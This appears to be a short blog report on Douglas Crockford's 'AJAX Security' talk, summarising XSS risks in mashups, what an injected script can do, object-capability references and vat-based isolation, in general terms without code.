Douglas Crockford, the creator of JSON, gave a talk entitled "AJAX Security" at the recent Web Directions South conference. In this talk, Crockford discussed some of the security concerns with AJAX applications and what can be done to address them.
Crockford emphasised that the main security concern with Ajax is the browser itself. The browser's security model is inappropriate for the Ajax applications of today. The popularity of Ajax has given rise to mashups, which has in turn introduced a new security risk. If your application uses scripts from more than one source, it is immediately insecure and can trigger an XSS attack as conflict of interest is not distinguishable within web pages, said Crockford. External sources, such as ads, widgets and AJAX libraries possess the same rights as the website's own scripts.
If an attacker manages to inject a script into your web page, they can:
- Fetch more scripts from anywhere else
- Send requests to your server, without it distinguishing that the request did not commence from your application
- See what the user sees
- Trick the user into giving information, as they are not aware that the request did not come from your application
- Send information to any other servers
A reference can be attained in the following ways:
- Creation — attained by a function that creates an object
- Construction — attained through an object's constructor
- Introduction — a reference between two objects is achieved through a third object — also known as capability.
Vat architecture is an interesting concept whose aim is to make mashups more secure. The idea is to put different programs into containers or vats where they can run without interfering with each other. Restricted communication between the vats occurs via capabilities, to prevent any potential attacks. Apparently, Google Gears will provide a feature like this.
View the full presentation below: